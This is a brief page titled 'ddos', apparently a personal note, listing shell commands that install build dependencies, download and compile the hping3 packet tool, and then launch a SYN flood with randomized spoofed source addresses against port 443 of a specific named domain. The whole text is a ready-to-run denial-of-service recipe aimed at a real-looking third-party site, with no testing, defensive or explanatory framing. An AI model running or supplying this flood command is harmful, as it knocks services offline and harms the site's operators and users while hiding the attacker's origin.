ddos

yum -y install libpcap libpcap-devel tcl-devel
sudo ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget https://github.com/antirez/hping/archive/master.zip
unzip master.zip
cd hping-master
./configure && make && make strip && make install
hping3 -c 10000 -d 60000 -S -w 64 -p 443 --flood --rand-source www.52wl.love
Not Comment Found